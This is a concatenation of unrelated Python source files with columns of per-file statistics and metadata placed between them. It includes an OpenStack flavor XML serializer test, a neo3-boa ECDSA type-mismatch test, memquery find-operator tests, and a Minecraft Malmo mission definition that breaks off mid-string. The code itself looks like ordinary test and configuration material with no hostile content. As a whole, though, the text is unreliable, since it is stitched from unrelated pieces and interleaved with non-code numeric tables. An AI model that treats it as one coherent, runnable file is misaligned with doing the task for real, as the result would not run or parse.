"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/12",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/12",
},
],
},
}
output = serializer.serialize(fixture, 'show')
print output
has_dec = output.startswith("<?xml version='1.0' encoding='UTF-8'?>")
self.assertTrue(has_dec)
def test_show(self):
serializer = flavors.FlavorXMLSerializer()
fixture = {
"flavor": {
"id": "12",
"name": "asdf",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/12",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/12",
},
],
},
}
output = serializer.serialize(fixture, 'show')
print output
root = etree.XML(output)
xmlutil.validate_schema(root, 'flavor')
flavor_dict = fixture['flavor']
for key in ['name', 'id', 'ram', 'disk']:
self.assertEqual(root.get(key), str(flavor_dict[key]))
link_nodes = root.findall('{0}link'.format(ATOMNS))
self.assertEqual(len(link_nodes), 2)
for i, link in enumerate(flavor_dict['links']):
for key, value in link.items():
self.assertEqual(link_nodes[i].get(key), value)
def test_show_handles_integers(self):
serializer = flavors.FlavorXMLSerializer()
fixture = {
"flavor": {
"id": 12,
"name": "asdf",
"ram": 256,
"disk": 10,
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/12",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/12",
},
],
},
}
output = serializer.serialize(fixture, 'show')
print output
root = etree.XML(output)
xmlutil.validate_schema(root, 'flavor')
flavor_dict = fixture['flavor']
for key in ['name', 'id', 'ram', 'disk']:
self.assertEqual(root.get(key), str(flavor_dict[key]))
link_nodes = root.findall('{0}link'.format(ATOMNS))
self.assertEqual(len(link_nodes), 2)
for i, link in enumerate(flavor_dict['links']):
for key, value in link.items():
self.assertEqual(link_nodes[i].get(key), value)
def test_detail(self):
serializer = flavors.FlavorXMLSerializer()
fixture = {
"flavors": [
{
"id": "23",
"name": "flavor 23",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/23",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/23",
},
],
},
{
"id": "13",
"name": "flavor 13",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/13",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/13",
},
],
},
],
}
output = serializer.serialize(fixture, 'detail')
print output
root = etree.XML(output)
xmlutil.validate_schema(root, 'flavors')
flavor_elems = root.findall('{0}flavor'.format(NS))
self.assertEqual(len(flavor_elems), 2)
for i, flavor_elem in enumerate(flavor_elems):
flavor_dict = fixture['flavors'][i]
for key in ['name', 'id', 'ram', 'disk']:
self.assertEqual(flavor_elem.get(key), str(flavor_dict[key]))
link_nodes = flavor_elem.findall('{0}link'.format(ATOMNS))
self.assertEqual(len(link_nodes), 2)
for i, link in enumerate(flavor_dict['links']):
for key, value in link.items():
self.assertEqual(link_nodes[i].get(key), value)
def test_index(self):
serializer = flavors.FlavorXMLSerializer()
fixture = {
"flavors": [
{
"id": "23",
"name": "flavor 23",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/23",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/23",
},
],
},
{
"id": "13",
"name": "flavor 13",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/13",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/13",
},
],
},
],
}
output = serializer.serialize(fixture, 'index')
print output
root = etree.XML(output)
xmlutil.validate_schema(root, 'flavors_index')
flavor_elems = root.findall('{0}flavor'.format(NS))
self.assertEqual(len(flavor_elems), 2)
for i, flavor_elem in enumerate(flavor_elems):
flavor_dict = fixture['flavors'][i]
for key in ['name', 'id']:
self.assertEqual(flavor_elem.get(key), str(flavor_dict[key]))
link_nodes = flavor_elem.findall('{0}link'.format(ATOMNS))
self.assertEqual(len(link_nodes), 2)
for i, link in enumerate(flavor_dict['links']):
for key, value in link.items():
self.assertEqual(link_nodes[i].get(key), value)
def test_index_empty(self):
serializer = flavors.FlavorXMLSerializer()
fixture = {
"flavors": [],
}
output = serializer.serialize(fixture, 'index')
print output
root = etree.XML(output)
xmlutil.validate_schema(root, 'flavors_index')
flavor_elems = root.findall('{0}flavor'.format(NS))
self.assertEqual(len(flavor_elems), 0)
| 33.823529
| 78
| 0.398454
| 2,199
| 25,875
| 4.544338
| 0.106412
| 0.055039
| 0.064645
| 0.039227
| 0.831282
| 0.815971
| 0.804363
| 0.786651
| 0.769439
| 0.753427
| 0
| 0.029923
| 0.466589
| 25,875
| 764
| 79
| 33.867801
| 0.694102
| 0.024812
| 0
| 0.660767
| 0
| 0
| 0.165341
| 0.013176
| 0
| 0
| 0
| 0
| 0.063422
| 0
| null | null | 0
| 0.014749
| null | null | 0.00885
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb35e007aaab7d0ad2de79724a48a235b8a0a74a
| 145
|
py
|
Python
|
boa3_test/test_sc/interop_test/crypto/VerifyWithECDsaSecp256r1MismatchedType.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | null | null | null |
boa3_test/test_sc/interop_test/crypto/VerifyWithECDsaSecp256r1MismatchedType.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | null | null | null |
boa3_test/test_sc/interop_test/crypto/VerifyWithECDsaSecp256r1MismatchedType.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | null | null | null |
from boa3.builtin.interop.crypto import verify_with_ecdsa_secp256r1
def Main():
verify_with_ecdsa_secp256r1('unit test', 10, b'signature')
| 24.166667
| 67
| 0.793103
| 21
| 145
| 5.190476
| 0.809524
| 0.183486
| 0.275229
| 0.440367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085271
| 0.110345
| 145
| 5
| 68
| 29
| 0.75969
| 0
| 0
| 0
| 0
| 0
| 0.124138
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
24d90ccf24bb3fa20c7ca925cb3cda65cb21334a
| 18,295
|
py
|
Python
|
languages/python/tests/test_find.py
|
robjsliwa/mem_query
|
09a1ba736c4d8faadb9df6618934a611fa168647
|
[
"MIT"
] | null | null | null |
languages/python/tests/test_find.py
|
robjsliwa/mem_query
|
09a1ba736c4d8faadb9df6618934a611fa168647
|
[
"MIT"
] | 8
|
2021-03-05T14:42:48.000Z
|
2021-04-17T19:20:27.000Z
|
languages/python/tests/test_find.py
|
robjsliwa/mem_query
|
09a1ba736c4d8faadb9df6618934a611fa168647
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from memquery import Collection, create_collection,\
collection
class TestFindAPI(TestCase):
def test_create_collection(self):
create_collection('TestCollection')
test_coll = None
try:
test_coll = collection('TestCollection')
except Exception as e:
pass
self.assertTrue(test_coll is not None)
def test_create_collection_not_found(self):
create_collection('TestCollection')
test_coll = None
try:
_ = collection('TestCollection1')
except Exception as e:
pass
self.assertTrue(test_coll is None)
def test_simple_query(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
docs = coll.find({"name": "Bob"})
self.assertTrue(len(docs), 1);
self.assertTrue(docs[0]["name"] == "Bob");
def test_simple_query_with_multiple_conditions(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
coll.insert({ "name": "Victor", "age": 20 })
docs = coll.find({"name": "Bob", "age": 20})
self.assertTrue(len(docs), 1)
self.assertTrue(docs[0]["name"] == "Bob")
def test_nomatch_query_with_multiple_conditions(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
docs = coll.find({"name": "Bob", "age": 21})
self.assertTrue(len(docs) == 0)
def test_query_match_with_and(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
docs = coll.find({ "$and": [{ "name": "Bob" }, { "age": 20 }] })
self.assertTrue(len(docs) == 1)
self.assertTrue(docs[0]["name"] == "Bob")
def test_query_nomatch_with_and(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
docs = coll.find({ "$and": [{ "name": "Bob" }, { "age": 21 }] })
self.assertTrue(len(docs) == 0)
def test_query_match_with_or(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
docs = coll.find({ "$or": [{ "name": "Bob" }, { "age": 30 }] })
self.assertTrue(len(docs) == 2)
def test_query_nomatch_with_or(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "name": "Rob", "age": 25 })
coll.insert({ "name": "Bob", "age": 20 })
coll.insert({ "name": "Tom", "age": 30 })
docs = coll.find({ "$or": [{ "name": "Toby" }, { "age": 40 }] })
self.assertTrue(len(docs) == 0)
def test_eq_op(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$eq": 20 } })
self.assertTrue(len(docs) == 2)
self.assertTrue(docs[0]["item"]["name"] == "cd")
self.assertTrue(docs[1]["item"]["name"] == "mn")
def test_eq_nomatch_op(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$eq": 200 } })
self.assertTrue(len(docs) == 0)
def test_eq_op_single_entry_embedded_doc(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "item.name": { "$eq": "ab" } })
self.assertTrue(len(docs) == 1)
self.assertTrue(docs[0]["item"]["name"] == "ab")
def test_eq_op_to_match_array_to_array(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "tags": { "$eq": [ "A", "B" ] } })
self.assertTrue(len(docs) == 2)
self.assertTrue(docs[0]["item"]["name"] == "ij")
self.assertTrue(docs[1]["item"]["name"] == "mn")
def test_eq_op_to_nomatch_array_to_array(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "tags": { "$eq": [ "C", "D" ] } })
self.assertTrue(len(docs) == 0)
def test_eq_op_to_match_array_to_value(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "tags": { "$eq": "B" } })
self.assertTrue(len(docs) == 4)
self.assertTrue(docs[0]["item"]["name"] == "ab")
self.assertTrue(docs[1]["item"]["name"] == "cd")
self.assertTrue(docs[2]["item"]["name"] == "ij")
self.assertTrue(docs[3]["item"]["name"] == "xy")
def test_gt_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$gt": 20 } })
self.assertTrue(len(docs) == 2)
self.assertTrue(docs[0]["item"]["name"] == "ij")
self.assertTrue(docs[1]["item"]["name"] == "xy")
def test_gt_no_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$gt": 200 } })
self.assertTrue(len(docs) == 0)
def test_gt_match_embedded_doc(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": 123 }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": 123 }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": 456 }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": 456 }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": 000 }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "item.code": { "$gt": 400 } })
self.assertTrue(len(docs) == 2)
self.assertTrue(docs[0]["item"]["name"] == "ij")
self.assertTrue(docs[1]["item"]["name"] == "xy")
def test_gte_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$gte": 20 } })
self.assertTrue(len(docs) == 4)
self.assertTrue(docs[0]["item"]["name"] == "cd")
self.assertTrue(docs[1]["item"]["name"] == "ij")
self.assertTrue(docs[2]["item"]["name"] == "xy")
self.assertTrue(docs[3]["item"]["name"] == "mn")
def test_gte_no_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$gte": 200 } })
self.assertTrue(len(docs) == 0)
def test_gte_match_embedded_doc(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": 123 }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": 123 }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": 456 }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": 456 }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": 000 }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "item.code": { "$gte": 456 } })
self.assertTrue(len(docs) == 2)
self.assertTrue(docs[0]["item"]["name"] == "ij")
self.assertTrue(docs[1]["item"]["name"] == "xy")
def test_lt_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$lt": 20 } })
self.assertTrue(len(docs) == 1)
self.assertTrue(docs[0]["item"]["name"] == "ab")
def test_lt_no_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$lt": 2 } })
self.assertTrue(len(docs) == 0)
def test_lt_match_embedded_doc(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": 123 }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": 123 }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": 456 }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": 456 }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": 000 }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "item.code": { "$lt": 400 } })
self.assertTrue(len(docs) == 3)
self.assertTrue(docs[0]["item"]["name"] == "ab")
self.assertTrue(docs[1]["item"]["name"] == "cd")
self.assertTrue(docs[2]["item"]["name"] == "mn")
def test_lte_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$lte": 20 } })
self.assertTrue(len(docs) == 3)
self.assertTrue(docs[0]["item"]["name"] == "ab")
self.assertTrue(docs[1]["item"]["name"] == "cd")
self.assertTrue(docs[2]["item"]["name"] == "mn")
def test_lte_no_match(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": "123" }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": "123" }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": "456" }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": "456" }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": "000" }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "qty": { "$lte": 2 } })
self.assertTrue(len(docs) == 0)
def test_lte_match_embedded_doc(self):
create_collection("TestCollection")
coll = collection("TestCollection")
coll.insert({ "item": { "name": "ab", "code": 123 }, "qty": 15, "tags": [ "A", "B", "C" ] })
coll.insert({ "item": { "name": "cd", "code": 123 }, "qty": 20, "tags": [ "B" ] })
coll.insert({ "item": { "name": "ij", "code": 456 }, "qty": 25, "tags": [ "A", "B" ] })
coll.insert({ "item": { "name": "xy", "code": 456 }, "qty": 30, "tags": [ "B", "A" ] })
coll.insert({ "item": { "name": "mn", "code": 000 }, "qty": 20, "tags": [ [ "A", "B" ], "C" ] })
docs = coll.find({ "item.code": { "$lte": 123 } })
self.assertTrue(len(docs) == 3)
self.assertTrue(docs[0]["item"]["name"] == "ab")
self.assertTrue(docs[1]["item"]["name"] == "cd")
self.assertTrue(docs[2]["item"]["name"] == "mn")
| 49.579946
| 106
| 0.47155
| 2,132
| 18,295
| 3.982645
| 0.041745
| 0.113061
| 0.148392
| 0.19079
| 0.955482
| 0.946296
| 0.933341
| 0.933341
| 0.903898
| 0.892474
| 0
| 0.043551
| 0.250724
| 18,295
| 369
| 107
| 49.579946
| 0.575868
| 0
| 0
| 0.761246
| 0
| 0
| 0.209062
| 0
| 0
| 0
| 0
| 0
| 0.204152
| 1
| 0.093426
| false
| 0.00692
| 0.00692
| 0
| 0.103806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
24e5a9c2659a59bbd4212d31fd1249ccfb3a8b94
| 42
|
py
|
Python
|
tests/test_financial_data.py
|
alfredoramirez3/financial_data
|
bf09c9cf51108363246d510d7406524f00503106
|
[
"MIT"
] | null | null | null |
tests/test_financial_data.py
|
alfredoramirez3/financial_data
|
bf09c9cf51108363246d510d7406524f00503106
|
[
"MIT"
] | null | null | null |
tests/test_financial_data.py
|
alfredoramirez3/financial_data
|
bf09c9cf51108363246d510d7406524f00503106
|
[
"MIT"
] | null | null | null |
from financial_data import financial_data
| 21
| 41
| 0.904762
| 6
| 42
| 6
| 0.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
24e885a6e640fd1a7dcdf95af0eeca6070c4ea76
| 9,410
|
py
|
Python
|
python/simpleMission.py
|
dquail/GVFMinecraft
|
5eae9ea9974ec604194b32cdb235765ea3fe7fb3
|
[
"MIT"
] | null | null | null |
python/simpleMission.py
|
dquail/GVFMinecraft
|
5eae9ea9974ec604194b32cdb235765ea3fe7fb3
|
[
"MIT"
] | null | null | null |
python/simpleMission.py
|
dquail/GVFMinecraft
|
5eae9ea9974ec604194b32cdb235765ea3fe7fb3
|
[
"MIT"
] | null | null | null |
from constants import *
missionXML = '''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>Hello world!</Summary>
</About>
<ServerSection>
<ServerInitialConditions>
<Time>
<StartTime>12000</StartTime>
<AllowPassageOfTime>false</AllowPassageOfTime>
</Time>
<Weather>clear</Weather>
</ServerInitialConditions>
<ServerHandlers>
<FlatWorldGenerator generatorString="3;7,44*49,73,35:1,159:4,95:13,35:13,159:11,95:10,159:14,159:6,35:6,95:6;12;"/>
<DrawingDecorator>
<DrawLine x1="-5" y1="56" z1="5" x2="5" y2="56" z2="5" type = "sand"/>
<DrawLine x1="-5" y1="57" z1="5" x2="5" y2="57" z2="5" type = "coal_block"/>
<DrawLine x1="5" y1="56" z1="5" x2="5" y2="56" z2="-5" type = "gold_block"/>
<DrawLine x1="5" y1="57" z1="5" x2="5" y2="57" z2="-5" type = "coal_block"/>
<DrawLine x1="5" y1="56" z1="-5" x2="-5" y2="56" z2="-5" type = "brick_block"/>
<DrawLine x1="5" y1="57" z1="-5" x2="-5" y2="57" z2="-5" type = "coal_block"/>
<DrawLine x1="-5" y1="56" z1="-5" x2="-5" y2="56" z2="5" type = "diamond_block"/>
<DrawLine x1="-5" y1="57" z1="-5" x2="-5" y2="57" z2="5" type = "coal_block"/>
<DrawBlock x="0" y="58" z="5" type = "iron_block"/>
<DrawBlock x="0" y="58" z="-5" type = "iron_block"/>
<DrawBlock x="5" y="58" z="0" type = "iron_block"/>
<DrawBlock x="-5" y="58" z="0" type = "iron_block"/>
<DrawBlock x="0" y="59" z="5" type = "iron_block"/>
<DrawBlock x="0" y="59" z="-5" type = "iron_block"/>
<DrawBlock x="5" y="59" z="0" type = "iron_block"/>
<DrawBlock x="-5" y="59" z="0" type = "iron_block"/>
</DrawingDecorator>
<ServerQuitWhenAnyAgentFinishes/>
</ServerHandlers>
</ServerSection>
<AgentSection mode="Survival">
<Name>MalmoTutorialBot</Name>
<AgentStart>
<Placement x="0.5" y="56" z="0.5" yaw="0"/>
</AgentStart>
<AgentHandlers>
<VideoProducer want_depth="false">
<Width>''' + str(WIDTH) + '''</Width>
<Height>''' + str(HEIGHT) + '''</Height>
</VideoProducer>
<ObservationFromGrid>
<Grid name="floor3x3">
<min x="-1" y="0" z="-1"/>
<max x="1" y="0" z="1"/>
</Grid>
</ObservationFromGrid>
<ObservationFromFullStats/>
<DiscreteMovementCommands />
</AgentHandlers>
</AgentSection>
</Mission>'''
originalMissionXML = '''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
